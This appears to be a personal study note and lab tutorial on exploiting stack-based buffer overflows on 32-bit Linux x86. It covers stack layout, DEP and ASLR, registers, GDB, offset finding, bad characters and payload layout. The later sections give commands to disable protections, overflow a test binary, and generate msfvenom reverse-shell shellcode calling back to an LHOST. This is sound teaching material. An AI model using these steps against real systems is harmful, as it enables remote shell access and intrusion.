Stack-Based Buffer Overflows on Linux x86.md
  1  ---
  2  abbr:
  3    - "IoT: Internet of Things"
  4    - "DEP: Data Execution Prevention"
  5    - "ASLR: Address Space Layout Randomization"
  6    - "ROP: Return Oriented Programming"
  - "GDB: GNU Debugger"
  8    - "FP: Frame Pointer"
  9    - "SP: Stack Pointer"
 10    - "EIP: Extended Instruction Pointer"
 11    - "EBP: Extended Base Pointer"
 12    - "NOPS: No Operation Instruction"
 14  ---
 15  ## Introduction
 16  
Buffer overflows are less common than they used to be, but they are still widely found in embedded devices and IoT.

Buffer overflows can also occur in web applications. [Read more here](https://www.bleepingcomputer.com/news/security/you-can-bypass-authentication-on-hpe-ilo4-servers-with-29-a-characters/)

If more data is written to a reserved memory buffer on the stack than it can hold, and nothing limits the write, the adjacent memory is overwritten. That memory holds saved register values such as the return address, so overwriting it can allow attacker-supplied code to be executed.
 22  
A buffer overflow could:
- Cause a program to crash
- Corrupt data
- Harm data structures in the program runtime
- Overwrite a function's return address so that attacker-chosen code runs with the vulnerable process's privileges
 28  
Most modern programming languages are far less prone to buffer overflows because they manage memory automatically, for example with [garbage collection](https://www.perplexity.ai/search/is-rust-also-vulnerable-to-buf-nk.nKBmiQHKGBdUieS7DAw#2), and check array bounds at runtime.
 30  
The **return address** is stored on the stack and holds the address of the instruction to execute once the current function returns. If it is overwritten, it can be made to point to another function or subroutine.
 32  
 33  ![[Pasted image 20250407132053.png]]
 34  
**.text**
	Stores the program's actual assembler instructions. This area is read-only; attempting to write to it causes a segmentation fault.

**.data**
	Stores global and static variables that are explicitly initialised by the program.

**Heap**
	Holds dynamically allocated memory. Starts after the **.bss** section and grows towards higher memory addresses.

**Stack**
	A *Last-In-First-Out* structure where local variables are stored in [[C]]/[[C++]]. It is a defined area inside [[RAM]] whose contents are accessed via the *stack pointer*.
 46  
 47  ### Modern memory protections
 48  
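Modern memory protections such as [[DEP]] and [[ASLR]] make buffer overflows much harder to exploit.

A stack [[Canary]] allows a buffer overflow to be detected: a known value is placed before the return address and checked before the function returns, and the process is aborted if the value has changed.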
 52  
 53  #### DEP
 54  
[[DEP]] marks regions of memory as non-executable.

These non-executable regions, such as the stack, are where user input is stored.

The idea of [[DEP]] is to prevent an attacker from placing shellcode in memory and then setting the instruction pointer to that shellcode.

To get around this, instead of executing code written to the stack, attackers chain together short instruction sequences that already exist in executable memory (like .text), each ending in a return. This is called ROP.
 62  
 63  #### ASLR
 64  
With ROP, the attacker needs to know where things are located in memory. [[ASLR]] was introduced to counter this by randomizing those locations each time a program runs.

One way around [[ASLR]] is to leak memory addresses, but this is not easy to do.
 68  
 69  ### Vulnerable Program
 70  
`strcpy()` is vulnerable to buffer overflow because it does not check the size of the destination and keeps writing until it reaches the source's null terminator. [Read more](https://www.perplexity.ai/search/why-is-strcpy-vulnerable-to-bu-h6ANjBEUR5qEK4UeKWq8Wg#0)
 72  
To practise exploiting a vulnerable [[C]] program, first disable [[ASLR]] (this requires root):
`echo 0 > /proc/sys/kernel/randomize_va_space`
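
As a rough way to confirm the setting took effect, the value can be read back and translated. This is a minimal Python sketch; the helper names `describe_aslr` and `current_aslr` are made up for illustration, and the descriptions summarise the three values the Linux kernel accepts for `randomize_va_space`.

```python
from pathlib import Path

ASLR_PATH = "/proc/sys/kernel/randomize_va_space"

# Meaning of each value the kernel accepts for randomize_va_space.
ASLR_MODES = {
    0: "disabled",
    1: "partial (stack, shared libraries, mmap)",
    2: "full (partial plus heap)",
}


def describe_aslr(raw_value: str) -> str:
    """Translate the text read from randomize_va_space into a description."""
    return ASLR_MODES.get(int(raw_value.strip()), "unknown")


def current_aslr(path: str = ASLR_PATH) -> str:
    """Read the live setting; only meaningful on Linux."""
    return describe_aslr(Path(path).read_text())


# Only query the live value when the file exists (i.e. on Linux).
if __name__ == "__main__" and Path(ASLR_PATH).exists():
    print(current_aslr())
```

After running the `echo 0` command above, the script should report `disabled`.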
 75  
To compile a [[C]] program with stack canaries (`-fno-stack-protector`) and [[DEP]] (`-z execstack`) disabled as a 32-bit binary:
`gcc input.c -o output -fno-stack-protector -z execstack -m32`
 78  
 79  There are more vulnerable [[C]] functions:
 80  - `gets`
 81  - `sprintf`
 82  - `scanf`
 83  - `strcat`
 84  
### GDB Introduction
 86  
 87  [[GDB]] provides us with breakpoints or stack trace output and allows us to intervene in the execution of programs
 88  
 89  [[GDB]] can be used to view the created binary on the assembly level
 90  
To set the default disassembly flavor (Intel or AT&T), use
`echo 'set disassembly-flavor (flavor)' > ~/.gdbinit`
 93  
 94  Below is the format of the output from using the command `disassemble main` in [[GDB]]
 95  
| Memory Address | Address Jumps | Assembler Instruction | Operation Suffixes |
| -------------- | ------------- | --------------------- | ------------------ |
 98  
 99  ### CPU Registers
100  
101  [[CPU]] registers can be split into:
102  - General registers
103  - Control registers
104  - Segment registers
105  
General registers can be split into Data registers, Pointer registers and Index registers
107  
108  #### Data registers
109  
| **32-bit Register** | **64-bit Register** | **Description**                                                                                             |
| ------------------- | ------------------- | ----------------------------------------------------------------------------------------------------------- |
| `EAX`               | `RAX`               | Accumulator is used in input/output and for arithmetic operations                                           |
| `EBX`               | `RBX`               | Base is used in indexed addressing                                                                          |
| `ECX`               | `RCX`               | Counter is used as the count for shift/rotate instructions and loops                                        |
| `EDX`               | `RDX`               | Data is used for I/O and in arithmetic operations for multiply and divide operations involving large values |
116  
117  #### Pointer registers
118  
| **32-bit Register** | **64-bit Register** | **Description**                                                                                                    |
| ------------------- | ------------------- | ------------------------------------------------------------------------------------------------------------------ |
| `EIP`               | `RIP`               | Instruction Pointer stores the offset address of the next instruction to be executed                               |
| `ESP`               | `RSP`               | Stack Pointer points to the top of the stack                                                                       |
| `EBP`               | `RBP`               | Base Pointer, also known as `Stack Base Pointer` or `Frame Pointer`, points to the base of the current stack frame |

#### Index registers
125  
| **32-bit Register** | **64-bit Register** | **Description**                                                               |
| ------------------- | ------------------- | ----------------------------------------------------------------------------- |
| `ESI`               | `RSI`               | Source Index is used as a pointer to a source for string operations           |
| `EDI`               | `RDI`               | Destination Index is used as a pointer to a destination for string operations |
130  
131  
132  ![[Pasted image 20250408130412.png]]
133  
134  
The FP points at the base of the current stack frame, directly below the saved return address, and it does not move while the function runs.

To reach the arguments used by addMe, we add 4 to the FP to get the return address, 8 to get the first argument, and 12 to get the second.
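
The offsets above can be sketched in Python as follows. This is a simplified model that assumes a 32-bit cdecl frame; the frame pointer value, the saved EBP, the return address and the call `addMe(3, 4)` are all made-up values for illustration.

```python
import struct


def frame_slots(ebp: int) -> dict:
    """Addresses of the slots at and above the frame pointer (32-bit cdecl)."""
    return {
        "saved_ebp": ebp,
        "return_address": ebp + 4,
        "arg1": ebp + 8,
        "arg2": ebp + 12,
    }


def read_dword(memory: bytes, base: int, address: int) -> int:
    """Read a little-endian 32-bit value from a memory image that starts at `base`."""
    start = address - base
    return struct.unpack("<I", memory[start:start + 4])[0]


# Hypothetical frame for addMe(3, 4), laid out from low to high addresses:
# saved EBP, return address, first argument, second argument.
EBP = 0xFFFFD000
image = struct.pack("<IIII", 0xFFFFD020, 0x08048456, 3, 4)

slots = frame_slots(EBP)
print(hex(read_dword(image, EBP, slots["return_address"])))
print(read_dword(image, EBP, slots["arg1"]), read_dword(image, EBP, slots["arg2"]))
```

Because the arguments sit at higher addresses than the frame pointer, they are reached by adding to it, while local variables sit below it.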
138  
139  **Keep in mind that the stack moves from high memory to low memory**
140  
141  [Read more about the Stack](https://0xinfection.github.io/reversing/pages/part-15-stack.html)
142  
143  ## Take Control of EIP
144  
```bash
# Start GDB quietly on the target binary
gdb -q bow32

# Run the program with 1200 bytes of 0x55 ('U') as its argument
(gdb) run $(python -c "print('\x55'*1200)")
```
150  
151  This will overwrite the **EIP** and **EBP** as can be seen with the command:
152  `(gdb) info registers`
153  
This process can be visualized as follows:
155  ![[Pasted image 20250408135346.png]]
156  
Since `strcpy()` does not check the size of the source against the size of the destination, it is vulnerable to buffer overflow

We need the exact number of input bytes required to reach the EIP, so that the following 4 bytes can be overwritten with our desired memory address
160  
To determine the offset, we use a [[Metasploit]] tool to create a unique pattern that helps us determine the number of bytes needed before we can write to the EIP
`/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l (length) > pattern.txt`

Once we have used the generated string as input in [[GDB]], we take the value found in EIP and pass it to a second [[Metasploit]] tool, which reports the offset
`/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q (value of EIP)`
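
To show why a unique pattern reveals the offset, here is a minimal Python sketch of the idea. It is not Metasploit's implementation; the function names simply mirror the two tools, and the crash value is simulated rather than taken from a real run.

```python
import string
import struct
from itertools import product


def pattern_create(length: int) -> str:
    """Build a non-repeating pattern (Aa0Aa1Aa2...) of up to 20280 characters."""
    triples = product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    pattern = ""
    for upper, lower, digit in triples:
        if len(pattern) >= length:
            break
        pattern += upper + lower + digit
    return pattern[:length]


def pattern_offset(eip_value: int, length: int) -> int:
    """Return how many bytes precede the 4 bytes found in EIP, or -1 if absent."""
    # x86 is little-endian, so the register holds the pattern bytes reversed.
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern_create(length).find(needle)


pattern = pattern_create(1200)
# Simulate a crash that left pattern bytes 100..103 in EIP (hypothetical).
eip = struct.unpack("<I", pattern[100:104].encode("latin-1"))[0]
print(hex(eip), pattern_offset(eip, 1200))
```

Every 4-byte window of the pattern is distinct within this length, so the value left in EIP identifies exactly one position in the input.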
166  
167  ### Determine the Length for Shellcode
168  
Once we know the number of bytes needed to reach the EIP, we can overwrite it with the address that points to the beginning of our shellcode
170  
```bash
# Run with the generated pattern, then read the value left in EIP
(gdb) run $(python -c "print('Aa0Aa1...')")
(gdb) info registers eip
```
175  
Find out how big our shellcode will be using [[Metasploit|msfvenom]]
`msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=31337 --platform linux --arch x86 --format c`

It is good practice to insert some NOPS before our shellcode, so that a return address that is slightly off still slides into the shellcode

To determine the length for the shellcode, we need:
1. A total of (number) bytes to reach and overwrite the EIP
2. About 100 additional NOPS before our shellcode
3. A total of (number) bytes for shellcode
185  
Below is a breakdown of the size allocation
- Buffer = "\x55" * (total bytes up to and including EIP - NOPs - shellcode - EIP)
188  - NOPS = "\x90" * 100
189  - Shellcode = "\x44" * 150
190  - EIP = "\x66" * 4
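
The breakdown can be checked with a short Python sketch. The function name `build_payload` and the offset of 1036 are assumptions for illustration only. Here `offset` means the number of bytes written before the EIP, so the whole payload is `offset + 4` bytes long.

```python
def build_payload(offset: int, nop_count: int, shellcode: bytes, eip: bytes) -> bytes:
    """Lay out padding + NOP sled + shellcode + new EIP value.

    `offset` is the number of bytes written before the saved EIP is reached.
    """
    if len(eip) != 4:
        raise ValueError("a 32-bit EIP value is exactly 4 bytes")
    padding_len = offset - nop_count - len(shellcode)
    if padding_len < 0:
        raise ValueError("NOP sled and shellcode do not fit before the EIP")
    return b"\x55" * padding_len + b"\x90" * nop_count + shellcode + eip


OFFSET = 1036  # hypothetical offset, not taken from a real run
payload = build_payload(OFFSET, 100, b"\x44" * 150, b"\x66" * 4)
print(len(payload), payload[OFFSET:].hex())
```

With these placeholder values the padding is 786 bytes, and the last 4 bytes of the payload land exactly on the EIP.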
191  
192  ![[Pasted image 20250408164315.png]]
193  
194  ### Bad Character Identification
195  
Binaries in [[UNIX]]-like operating systems historically began with two bytes containing a **magic number** that determines the file type

Similar reserved characters also exist in applications, where they are known as **bad characters**.

These **bad characters** can vary, but we will often see characters like these:
- `\x00` - Null Byte
- `\x0A` - Line Feed
- `\x0D` - Carriage Return
- `\x0C` - Form Feed
- `\xFF` - Byte value 255
205  
A list of all **256 characters** (`\x00` to `\xFF`) can be sent to the program to find out which characters it truncates or alters

Use the formula from the previous section, but replace the NOPS and Shellcode with CHARS
- Buffer = "\x55" * (total bytes up to and including EIP - number of chars (256) - EIP)
210  - CHARS = "\x00\x01.....\xFF"
211  - EIP = "\x66" * 4
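
A minimal Python sketch for generating the character list and the matching buffer length is shown here. The helper names and the total of 1040 bytes are hypothetical, and the total is assumed to include the 4 bytes of the EIP.

```python
def build_charlist(known_bad=()) -> bytes:
    """Return every byte value 0x00..0xFF in order, minus the known bad ones."""
    bad = set(known_bad)
    return bytes(value for value in range(256) if value not in bad)


def as_escaped(data: bytes) -> str:
    """Format bytes as a \\x.. string that can be pasted into a command."""
    return "".join(f"\\x{value:02x}" for value in data)


def padding_length(total: int, chars: bytes, eip_size: int = 4) -> int:
    """Buffer length so that padding + chars + EIP adds up to `total` bytes."""
    return total - len(chars) - eip_size


# After discovering that 0x00 is bad, rebuild the list without it.
chars = build_charlist(known_bad=[0x00])
print(len(chars), as_escaped(chars[:4]))
print(padding_length(1040, chars))  # 1040 is a hypothetical total
```

Each time a bad character is removed the list shrinks by one byte, so the buffer must grow by one byte to keep the EIP overwrite aligned.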
212  
We can't simply run the program to completion, because it will crash without giving us the chance to follow what happens in memory.

To overcome this, we will set a breakpoint at the vulnerable function
`break (funcname)`

Once we have put a breakpoint at the function we want, we run the program with our chars
219  
220  Then we can look at the stack
221  `(gdb) x/2000xb $esp+500`
222  
Go through all the chars in order and note the first character that is missing or altered. Remove it from the char list, increase the Buffer length by one to compensate, and repeat until every remaining character appears intact.
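
The comparison can also be sketched in Python. This assumes the bytes dumped from the stack have been copied into a `bytes` object that starts exactly where the char list begins in memory; the function name and the sample dump are made up.

```python
def first_bad_char(sent: bytes, dumped: bytes):
    """Return the first sent byte that is missing or altered in the dump."""
    for position, expected in enumerate(sent):
        if position >= len(dumped) or dumped[position] != expected:
            return expected
    return None  # every byte arrived intact


sent = bytes(range(1, 256))  # char list with 0x00 already removed
# Hypothetical dump in which the program replaced 0x09 with a null byte.
dumped = sent[:8] + b"\x00" + sent[9:]

bad = first_bad_char(sent, dumped)
print(hex(bad) if bad is not None else "no bad characters found")
```

Only the first mismatch is reliable, because a bad character can truncate or shift everything after it, which is why the check is repeated after each removal.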
224  
225  ### Generating Shellcode
226  
To generate shellcode with [[Metasploit|msfvenom]], we can run
`msfvenom -p linux/x86/shell_reverse_tcp lhost=(lhost) lport=(lport) --format c --arch x86 --platform linux --bad-chars "bad-chars" --out (filename)`

Below is a breakdown of the size allocation
- Buffer = "\x55" * (total bytes up to and including EIP - NOPs - shellcode - EIP)
232  - NOPS = "\x90" * 100
233  - Shellcode = "\x44....."
234  - EIP = "\x66" * 4
235  
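Since we still have control over the EIP, we can point it at a memory address inside our NOPS sled, from which execution slides into the shellcode

**Make sure you know whether the system uses little-endian or big-endian byte order.** x86 is little-endian, so the bytes of the address are written in reverse order.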
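
To illustrate the byte order, the sketch below packs a 32-bit address the way a little-endian x86 target expects it. The address `0xFFFFD64C` and the helper name `pack_eip` are hypothetical; the real address has to be read from the stack dump in [[GDB]].

```python
import struct


def pack_eip(address: int) -> bytes:
    """Pack a 32-bit address in little-endian order, as x86 stores it."""
    return struct.pack("<I", address)


def contains_bad_char(data: bytes, bad_chars: bytes) -> bool:
    """True if any byte of `data` is in the bad character list."""
    return any(value in bad_chars for value in data)


HYPOTHETICAL_ADDRESS = 0xFFFFD64C  # made-up address inside the NOP sled
eip = pack_eip(HYPOTHETICAL_ADDRESS)
print(eip.hex())
print(contains_bad_char(eip, b"\x00\x0a\x0d"))
```

The address bytes must also be free of bad characters. If they are not, another address inside the NOP sled can be chosen instead.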